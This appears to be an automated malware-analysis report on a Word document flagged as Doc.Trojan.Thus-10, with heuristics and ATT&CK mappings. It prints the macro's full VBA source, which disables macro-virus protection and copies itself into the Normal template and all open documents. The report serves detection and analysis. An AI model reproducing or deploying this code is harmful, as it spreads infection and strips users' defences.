MALICIOUS
208
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros that are designed to disable macro security and replicate themselves across the Normal template and other open documents. This self-replication behavior, along with the ClamAV detection name 'Doc.Trojan.Thus-10', strongly suggests a malicious macro-based document. The script explicitly attempts to disable virus protection and copy its code, indicating a persistence and spread mechanism.
Heuristics 4
-
ClamAV: Doc.Trojan.Thus-10 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Thus-10
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
On Error Resume Next Application.Options.VirusProtection = False If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Anti-Smyser'" Then -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() 'Thus_001'
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2301 bytes |
SHA-256: a25a5f2d2e5aabc3dd323fae7064a4a73534f5793d02db5062e9f71bae8365c1 |
|||
|
Detection
ClamAV:
Doc.Trojan.Thus-10
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() 'Thus_001' 'Anti-Smyser' ' This virus is an alteration of a virus which was ' designed to delete all files from one's C: drive on Dec 13th. ' This code is completely benign. On Error Resume Next Application.Options.VirusProtection = False If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Anti-Smyser'" Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _ .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _ .CodeModule.CountOfLines End If If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _ .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _ .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _ .Item(1).CodeModule.CountOfLines) End If If NormalTemplate.Saved = False Then NormalTemplate.Save For k = 1 To Application.Documents.Count If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Anti-Smyser'" Then Application.Documents.Item(k).VBProject.VBComponents.Item(1) _ .CodeModule.DeleteLines 1, Application.Documents.Item(k) _ .VBProject.VBComponents.Item(1).CodeModule.CountOfLines End If If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then Application.Documents.Item(k).VBProject.VBComponents.Item(1) _ .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _ .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _ .VBComponents.Item(1).CodeModule.CountOfLines) End If Next k End Sub Private Sub Document_Close() Document_Open End Sub Private Sub Document_New() Document_Open End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.